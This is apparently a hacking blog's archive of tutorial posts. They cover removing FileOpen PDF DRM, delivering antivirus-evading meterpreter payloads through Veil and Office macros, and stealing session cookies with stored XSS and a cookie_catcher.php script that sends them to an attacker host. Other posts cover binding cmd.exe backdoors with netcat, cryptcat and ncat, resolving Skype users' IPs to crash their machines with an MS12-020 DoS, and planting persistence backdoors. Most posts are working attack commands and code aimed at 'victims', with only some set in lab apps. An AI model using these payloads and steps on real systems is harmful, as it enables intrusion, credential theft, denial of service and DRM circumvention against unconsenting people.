Hacking & Tricks

How to Remove FileOpen DRM Protection from PDF?

2024-12-31T16:23:00.003+05:30

If you want to remove FileOpen DRM protection from a PDF, follow these steps. Note that this method will only work on a system that already has the necessary permissions to open the DRM-protected PDF.

Manual Method-

Download De_DRM_tools from here

Unzip De_DRM_tools-master.zip

Within the new folder DeDRM_tools-master, navigate to \Other_Tools\Tetrachroma_FileOpen_ineptpdf

Right click and open the file ineptpdf_8.4.51.pyw

Additional files to install are-

1)Python 2.7 download here

2)PyCrypto

3)PyWin extension

4)FileOpen plugin

• Open Command Line in the folder C:\Python27\Scripts -> This can be done by navigating to C:\Python27, hold shift, right click on Scripts and press 'Open command window here'

•To install PyCrypto, type pip install pycryptodome

• To install the PyWin extension, type pip install pywin32

• To install the FileOpen plugin, go to https://plugin.fileopen.com/ and install the latest version

• Navigate back to the folder C:\Users\XX\Downloads\DeDRM_tools-master\Other_Tools\Tetrachroma_FileOpen_ineptpdf

• Right click on ineptpdf_8.4.51.pyw

• Navigate to line 2285 and change the value of x in 'self.fileopen['Build']='x' to the build number as shown on the FileOpen plugin page (Windows Installer link)

• Double click on ineptpdf_8.4.51.pyw

• Ignore the Password or Key file box, press the dots to add an input file, type the name of the decrypted output file and press decrypt.

• Decrypted file will appear at C:\Users\XX\Downloads\DeDRM_tools-master\Other_Tools\Tetrachroma_FileOpen_ineptpdf

If you required exe file & dont want to install python & dependency , just comment here, I will share the same.

How to install and use Veil-Catapult in backtrack?

2014-02-09T01:34:00.003+05:30

Today we are gonna talk about Veil-Catapult.Veil-Catapult is payload delivery for when metasploit’s psexec getting caught by AV.It utilizes Veil-Evasion to generate AV-evading binaries, impacket to upload/host the binaries, and the passing-the-hash toolkit to trigger execution.It officially supported on kali linux only.I`m going to show you how to install Veil-Catapult in backtrack?

First if you have not already installed veil-evasion framework then first install it as mentioned here.After installing Veil-evasion follow steps.

root@bt:~wget https://github.com/Veil-Framework/Veil-Catapult/archive/master.zip

root@bt:~unzip master.zip

root@bt:~cd Veil-Catapult-master/

root@bt:~sh setup.sh

Now veil-catapult require impacket library & passing the hash toolkit.So setup script try to install PTH suite but we got error.So we have to manually do it.

Install passing the hash.

root@bt:~wget https://passing-the-hash.googlecode.com/files/wmiPTH-1.0-1.deb

root@bt:~wget https://passing-the-hash.googlecode.com/files/winexePTH1.1.0-1.deb

root@bt:~dpkg -i winexePTH1.1.0-1.deb

root@bt:~dpkg -i wmiPTH-1.0-1.deb

If you are using other OS then you have to manually build it as mentioned here .

It installed into the /opt/pth/bin folder , we have to move it into /usr/bin.

root@bt:~# ln -s /opt/pth/bin/wmis /usr/bin/pth-wmis

root@bt:~# ln -s /opt/pth/bin/winexe /usr/bin/pth-winexe

root@bt:~# ln -s /opt/pth/bin/wmic /usr/bin/pth-wmic

Installing impacket library

root@bt:~# wget http://corelabs.coresecurity.com/index.php?module=Wiki&action=attachment&type=tool&page=Impacket&file=impacket-0.9.11.tar.gz

root@bt:~# tar -xvzf impacket-0.9.11.tar.gz

root@bt:~# cd impacket

root@bt:~# python setup.py build

I know you have question that we can install it , but when we tried to install , it installed succesfully ;but some of modules are missing.So we first gonna build it then copy it. Now copy folder impacket from build/lib.linux-i686-2.6/ and paste it into /usr/lib/pymodules/python2.6

Now everything is ready ,we can run it. Before that open /etc/veil/settings.py and checkout all path.

root@bt:~/Veil-Catapult-master# python Veil-Catapult.py

Now select number according to your choice & fill out necessary option.

Powershell injector

Barebones python injector

Sethc backdoor

Reboot, hit Shift key 5 times, SYSTEM shell will pop up. Also there is script for it in metasploit.Check it out this awesome blog for more details.

EXE delivery upload

Cleanup resource script is generated , you can use it after your work completed for kill process & remove exe.

You can also host exe using temporary SMB server.This will load the payload executable into memory without touching disk, allowing otherwise disk-detectable executable to bypass detection

Alternatives of Veil-Catapult are smbexec and keimpx.

Deliver powershell payload using macro.

2014-01-06T19:27:00.000+05:30

In past we saw method of direct shell code execution in Ms word or Excel using macro;but if document is closed then we will lose our shell so we have to migrate to other process and sometimes migration is pick up by AV. So in this tutorial we are going to use powershell payload.

Advantages of this method:-

(1)Persistence
(2)Migration is not needed
(3)AV bypass

(1)First we will generate powershell payload; for this purpose i used SET.You can also used Veil or powersploit.Open SET in terminal & select Social-Engineering Attacks and then Powershell Attack Vectors.Generate Powershell Alphanumeric Shellcode Injector.Fill LHOST & LPORT value.

Our generated powershell payload is located into /root/.set/reports/powershell/. Rename x86_powershell_injection.txt to x32.ps1.

(2)Now Clone git repository of code

root@bt:~# git clone https://github.com/enigma0x3/Old-Powershell-payload-Excel-Delivery

root@bt:~# cd Powershell-payload-Excel-Delivery/

(3)In Powershell-payload-Excel-Delivery folder; rename RemovePayload.bat to remove.bat. Now you have to host remove.bat and x32.ps1 to web-server.Then open persist.vbs file and change URL of x32.ps1 in line 13,33 to your hosted x32.ps1 `s URL. And now also host persist.vbs to web-server. I used localhost.

(4)Open Macrocode file from cloned folder & change URL in line 27,82,118 respectively to your hosted x32.ps1,persist.vbs and remove.bat `s URL.Now add this macro code into excel document as mentioned in previous tutorial.

(5)And last step is setup listener.

Now send this document to victim , as soon as he open document and run macro we will get shell. Once the payload is ran, it runs in the powershell process, so if the user closes excel, you keep your shell. You also remain in a stable process until reboot, so migration is not needed.

It then pulls down a persistence script, drops it, creates a registry key for autorun for the persistence script. Once done, it also drops a self-deleting bat file that removes the initial payload from the system.

Thanks to enigma0x3 for this awesome method.

Update :- New-Powershell-Payload-Excel-Delivery

This is a VBA macro that uses Matt Graeber's Invoke-Shellcode to execute a powershell payload in memory as well as schedule a task for persistence(20 min onidle you get shell).

root@bt:~# git clone https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery.git
root@bt:~# cd Powershell-Payload-Excel-Delivery/

Open MacroCode file & change Download URL for Invoke-Shellcode file & change LHOST & LPORT option. Now add macro-code in Excel file & start-up listener.

Creating custom username list & wordlist for bruteforciing.

2013-12-18T14:04:00.000+05:30

During brute-forcing every time you need custom password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in username enumeration.

Creating custom username list:-

(1)Jigsaw:-

During information gathering stage , you may use jigsaw script. It is great script for gathering employees `s details like fullname, position, department, email addresses.You should use script with your jigsaw credential.

some times email address`s initial can be username of employee.So you can get different username from output of jigsaw script.

(2)Username script:-

If you have full name of users then you can use username.py script to generate possible username by using different combination of first name & last name.

I also write bash script which generate possible username using first name, last name & birth date.

Creating Custom word list:-

(1)Cewl:-

Custom Word List generator. CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words.

(2)Wyd:-

wyd is a password profiling tool that extracts words/strings from supplied files and directories. It parses files according to the file-types and extracts the useful information, e.g. song titles, authors and so on from mp3's or descriptions and titles from images.

(3)Cupp:-

People spend a lot of time preparing for effective dictionary attack. Common User Passwords Profiler (CUPP) is made to simplify this attack method that is often used as last resort in penetration testing and forensic crime investigations. A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.

XPATH Injection Tutorial

2013-11-29T18:44:00.000+05:30

XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<Employees>

<Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
</Employee>
<Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
</Employee>
<Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
</Employee>
<Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
</Employee>
</Employees>

Bypass Authentication:-

Browse to the login.php page; here we can see simple login form.

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password: ' or '1' = '1

Looks quite familiar, doesn't it? Using these parameters, the query becomes:

string(//Employee[uname/text()='' or '1' = '1' and passwd/text()='' or '1' = '1']/account/text())

As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.

Blind Xpath Injection:-

If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.

Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.

Enter ' or '1' = '1 in search , & you will get all FirstName regardless of any ID(Number).

In blind Xpath injection we have to provide special crafted query to application, if query is true we will get result otherwise we will not get any result.Till now We don`t know about any parent or child node of XML document.

Guessing of parent node:-

Supply following query to application & observe result.

' or substring(name(parent::*[position()=1]),1,1)='a

Nothing append , we don`t get FirstName of users.It means first letter of parent node is not "a". Now supply following query

' or substring(name(parent::*[position()=1]),1,1)='E

You get result , It means first letter of parent node is "E"

To guess second letter of parent node supply following query

' or substring(name(parent::*[position()=1]),2,1)='m

Following the same procedure, we can extract the full name of the parent node, which was found to be 'Employee'.

We can also get child node. Browse to the xpath.php page & enter following query.

//Employee[position()=3]/child::node()[position()=4]/text()

You got output from parent node Employee id 3 & child node whose position is 2.

To get whole document put following query.

//Employee

It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:

count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.
string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.

I used recon-ng xpath bruteforcer for xpath injection attack & we will get back end XML file.

Useful Links & Blind XPATH injection Tools:-

https://www.owasp.org/index.php/XPATH_Injection

https://www.owasp.org/index.php/Blind_XPath_Injection

XPATH BLIND EXPLORER:- http://code.google.com/p/xpath-blind-explorer/downloads/list

XCAT:- https://github.com/orf/xcat

Broken Authentication & Session Management in Mutillidae

2013-11-20T14:04:00.001+05:30

Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

Authentication Bypass
Privilege Escalation
Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

Using cookie
Using brute-force
Using SQL injection

(1)Authentication Bypass using cookie:-

As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.

(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php

(2)Submit following html to blog

<html>
<body>
<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe >
</body>
</html>

Replace Link http://192.168.56.1/cookie_catcher.php to your uploaded cookie_catcher.php

(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.

(4)To view cookie open cookie.html.

(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.

(6)After reload we got admin access to web-application.

(2)Authentication Bypass Using bruteforce:-

You can use hydra or burpe intruder to bruteforce login form of application.

hydra -l admin -P /root/pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

(3)Authentication Bypass Using sql injection:-

We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to login form.

You can use SQL injection cheat sheet & we will brute-force using SQL statements.Save it to file.

hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

And we got for valid SQL statements ; with help of it we can bypass admin panel.

How to solve compile error in veil?

2013-11-16T17:29:00.002+05:30

As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.

pure windows/meterpreter/reverse_tcp stager, no shellcode
pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode

Compiler Error in c payloads:-

Available c payloads:

    VirtualAlloc                         Poor
    VoidPointer               Poor
    meter_rev_tcp                     Excellent
    meter_rev_tcp_service        Excellent

I used c/meter_rev_tcp. After setting of LHOST & LPORT ; when i try to generate it ; i got error.

sh: i686-w64-mingw32-gcc: command not found

Okay now we successfully generated payload file, but we get compiler error while compiling into cross-platform exe.

Error clearly suggest that i686-w64-mingw32-gcc is not installed.The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems.In short, to compile the payload for 64 bit windows ; we have to install mingw-w64.

In case of 32 bit windows os , we can compile it,because when you setup veil environment mingw32 installed using wine.

Compile payload for 32 bit:-

root@bt:~# cd .wine/drive_c/MinGW/bin/

root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32 -o output.exe

So our payload is compiled into exe for 32 bit windows.

Compile payload for 64 bit:-

For this purpose you have to install mingw32-w64.

Download from here & build it.If you don`t want to install it; then you can use pre-compiled version.

root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe

I don`t test compiled exe in 64 bit, so if anyone use it, please let me know exe is working or not.

If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, click here.

Compiler error in C#:-

Available c# payloads:

VirtualAlloc Poor
b64SubVirtualAlloc Normal

root@bt:~/Downloads/Veil-master# ./Veil.py -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST=192.168.56.101 LPORT=443

Our source file has been generated and got following error.
error CS2007: Unrecognized command-line option: `-platform:x86'

gmcs /root/veil-output/source/payload.cs

Now our exe is generated,it`s in same source folder.

Username Enumeration in Mutillidae using Burpe Intruder.

2013-11-11T13:16:00.000+05:30

Mutillidae is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.

Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.

In Mutilliade login page , when you provide valid username & invalid password , web-application reply us that password incorrect.

When we provide invalid username ; then application tell us that Account does not exist.

So by monitoring web-application message one can know that username is valid or not.

First we will examine source code of page ; when we provide valid username reply is "var lAuthenticationAttemptResultFlag = 1" & when we provide invalid username reply is "var lAuthenticationAttemptResultFlag = 0"

var lAuthenticationAttemptResultFlag = 1 It means username exist.

var lAuthenticationAttemptResultFlag = 0 It means username does not exist.

Alternatively we can do this by saving both page (valid username & invaild username) source code in text file & then use diff command.

root@bt:~# diff login password
762c762
< var lAuthenticationAttemptResultFlag = 0;
---
> var lAuthenticationAttemptResultFlag = 1;

Now Open burpe suite, setup listener ; try to sign in from browser & capture request.

Now right click on request & click on send to inrtuder.

For position we choose only username.

On payload tab ---) payload option ----) load sample username list.

In option tab ---) Grep match ---) Add
var lAuthenticationAttemptResultFlag = 1; var lAuthenticationAttemptResultFlag = 0;

Click on intruder ---) start Attack

Now Burpe make request to login page & examine request & classified responce according to option which we provided.

Click on save , result table & Delimiter click on custom & put ";" ,then select column which we need , in this case i select payload,var lAuthenticationAttemptResultFlag = 1,var lAuthenticationAttemptResultFlag = 0 and then save it.

Saved file is look like following format.

In file first is username ; then true means username exist , false menas username is invalid. So now we only need entry which second column is true.

So i saved this value in another temp file from where you can extract username from file using delimiter. I used simple python script for this purpose.

Finally we got list of username which exist on system.

List of Differnet AV evasion Frameworks.

2013-10-30T15:50:00.000+05:30

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-

Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-

Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

If you are using other interface than eth , then you have to change in script avoid.sh . For exmaple ; i am using ppp0 interface ,so open avoid.sh file & replace line 150 which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }') with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').

Click here for original author`s blog.

(3)Syringe:-

wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh

As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.

(4)Shellcodeexec:-

git clone https://github.com/inquisb/shellcodeexec

we are gonna use downloaded shellcodexec in third step on victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

Click here for detail tutorial on how to use shellcodeexec?

(5)Hypersion:-

Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

(6)Crypter.py:-

Download it from below link .
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip script.zip
python crypter.py

If you get error while running then change path of structure.c in line 45 & save it , run again.

(7)Brute-force AV Evasion :-

Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

Click here for Original tutorial

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-

Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .

(9)Powershell:-

Bypass AV using SET powershell module using Batch file

Get shell using powersploit

Deliver powershell payload using macro

(10)Get Shell Using VB script:-

Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For details tutorial click here

(11)Ghost Writing ASM :-

Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don’t break the functionality of the application.After that compile into EXE.

For tutorial click here .

(12)Different Pivoting technique to bypass AV :-

Following are framework & module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion then please comment here.

Backdoor using Netcat, cryptcat , ncat.

2013-10-24T17:30:00.000+05:30

Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here. Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P : 192.168.56.1

Victim`s I.P. : 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-

Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection possible by AV.

Virustotal link of netcat

(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.

(3)No authentication:- anyone can start listner to connect back to our backdoor , because there is no mechanism to verify that user are authorized or not.

(B)Cryptcat:-

Cryptcat is same as netcat but in advanced it provide encryption & authentication mechanism.

How to install cryptcat?

In case of backtrack , apt-get install cryptcat .

If you are in other linux OS , then you have to manually installed it from source ; because in repository it does not come with e option , so we can not bind any program to it.

So download source from here .

unzip it , change directory & enter following command

make unix

To make exe(windows compatible) from source , use visual studio.

root@bt:~# cryptcat -h
[v1.10]
connect to somewhere:    nc [-options] hostname port[s] [ports] ...
listen for inbound:      nc -l -p port [-options] [hostname] [port]
options:
    -e prog            program to exec after connect [dangerous!!]
    -g gateway    source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h                     this cruft
    -k secret    set the shared secret
    -i secs              delay interval for lines sent, ports scanned
    -l        listen mode, for inbound connects
    -n           numeric-only IP addresses, no DNS
    -o file           hex dump of traffic
    -p port           local port number
    -r           randomize local and remote ports
    -s addr           local source address
    -u                     UDP mode
    -v                     verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -z                     zero-I/O mode [used for scanning]

Most of options are same as netcat, but look at new option as -k , it provide password for communication.

On victim machine type following command

cryptcat -Ldp 455 -e cmd.exe

On attacker side , setup listner

cryptcat 192.168.56.101 455

Look at following figure ; where we capture traffic using wireshark ; it`s encrypted.

You can also provide -k option for authentication.So in case of cryptcat we got authentication & encryption.

But still it detected by AV.

Virustotal link

(3)Ncat:-

Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat.Ncat come with nmap , so in attacker side we have already installed ncat.

To download ncat for windwos click here.

View man page of ncat or ncat --help ; it has so many option.

For encryption & authentication you can use ssl ,ssl cert, ssl key ,ssl verify.

on victim side:-

ncat -lvp 455 --ssl -e cmd.exe --allow 192.168.56.1

I encrypt communication using ssl & only allow 192.168.56.1 ip to connect back.It`s possible to connect back using spoofing I.P.

on attacker side

ncat 192.168.56.101 445 --ssl

And it does not detected by AV.

Virustotal Link

So with help of ncat , we can get around of our problems which are no-authentication, no-encryption, caught by AV.

Get shell Using Shellcode in Macro.

2013-10-18T15:12:00.001+05:30

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit

Now we have generated our shellcode. Now we will create macro.

(1)Open any word or Excell document

(2)Click on view & then click on Macros.

(3)Give name to macro & create macro.

(4)Remove all things from modules windows & Paste our generated VB code.

(5)Saved it as type Word Macro-Enabled Document.

Send this file to victim. By default in MS Office " Disable all macros with notification " option is enabled , so whenever any document try to execute Macro it will pop up security warning that macro is disable ; so to execute our shellcode using macro victim should click on Enable content.

You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener

use exploit/multi/handler
set lhost 192.168.56.102
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Here we setup migrate script as autorunscript so when document will closed our shell will not die.

How to detect Avast Antivirus remotely?

2013-10-14T19:49:00.001+05:30

During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?

Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.

In above image you can see that avast logo which address is localhost:12080/$$avast-webshield$$/image001.png . So if in client machine avast is installed than that image is also located at that address , by examine image is exist or not we can know that whether avast is installed or not.

For this purpose victim should visit our link where we can check about image.So i am gonna use my apache server ; where i put three html page. One is our link which we gonna send to victim ; if image exist it redirect to other document ; & if image does not exist it redirect to third html page.

(1)Make blank html page & give it to name avst.html & put following code in that html page.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(2)Now make second html page & give it to name ntavst.html & put same code in that page.

<meta http-equiv="refresh" content="0; url=http://google.com/">

(3)Make third & final html page and give it to name exp.html & put following code.

<div dir="ltr" style="text-align: left;" trbidi="on">

<img src="http://127.0.0.1:12080/$$avast-webshield$$"/image001.png" onload="document.location='http://180.215.198.150/avast.html'" onerror="document.location='http://180.215.198.150/ntavast.html'" />

Note:- Change your i.p in above code.

Now put these all document in /var/www/ folder.And send link of exp.html to victim

So if avast installed then it redirect to avast.html page & finally redirect to google.com & if it does not installed then it will redirect to ntavst.html page & then redirect to google.com

Now check your apache log file from \var\log\apache2\log ; you can check if avst.html page has been visited or ntavst.html page.

PS: You can use cobalt strike `s system profiler which get you os version; browser detail; java version ; adobe reader version & flash version.

Fun with skype resolver

2013-10-11T19:06:00.000+05:30

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.

If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you got reply use following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have I.P. of victim.

In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.You can also use bash script for getting ip of victim which i wrote.

root@bt:~# git clone https://github.com/niravkdesai/skypersolver.sh

root@bt:~# cd skypersolver.sh/

root@bt:~/skypersolver.sh# sh skypersolver.sh

Use one of following links to get I.P. of your victim using his skype user-name.

(1)http://www.skyperesolver.com/

(2)http://skresolver.com/

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/

Okay we got I.P. Now you can directly DOS or DDOS( ddos and dos attacks are illegal) them . But we are going to use different technique to shutdown your victim pc using RDP.

First scan ip to find open ports of victim.

root@bt:~# nmap 192.168.56.101

Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 995 filtered ports
PORT      STATE SERVICE
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)

From result we can see that port 3389 is open which is used for RDP.

Now we will use metasploit Auxiliary module to check vulnerability.

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(ms12_020_check) > run

[+] 192.168.56.101:3389 Vulnerable to MS12-020
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Okay we got that host is vulnerable to MS12-020.Now we will use metasploit module to Dos that I.p.

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.56.101:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.56.101:3389 - 210 bytes sent
[*] 192.168.56.101:3389 - Checking RDP status...
[+] 192.168.56.101:3389 seems down
[*] Auxiliary module execution completed

And bingo ; your victim machine should be restarted. :)

Get shell using Missing Autoruns.

2013-10-07T13:20:00.002+05:30

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.

(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.

After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.

(1)Get meterpreter shell.

(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.

(3)Now from uploaded directory execute following command to get missing autoruns of machine

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4)Now we have list of file which is missing ; these files are run at startup time.

(5)In my case you can see that uTorrent.exe is missing .

(6)So now i rename my backdoor to uTorrent .exe & uploaded to the path where it`s not found.

Now whenever machine is restarted you get shell.(Don`t forget to running multi/handler!!!)

For just POC ; you can run autorunsc.exe again to find out whether our backdoor (uTorrent.exe) is written successfully or not?

In above image you can see that uTorrent.exe is no longer missing which missed in previous step.

(B)Now this is second method; but may be suspicious.

When you put binary in start up folder it will run automatically when pc is started.

Startup Folder Location in windows Xp:-

C:\Documents and Settings\"nirav"\Start Menu\Programs\Startup

Startup Folder location In windows 7:-

C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

So upload your binary to start up folder ;make it hidden using following command.
attrb +h backdoor.exe
Restart machine & Hopefully you will get shell.

Schedule Task in windows after Exploitation.

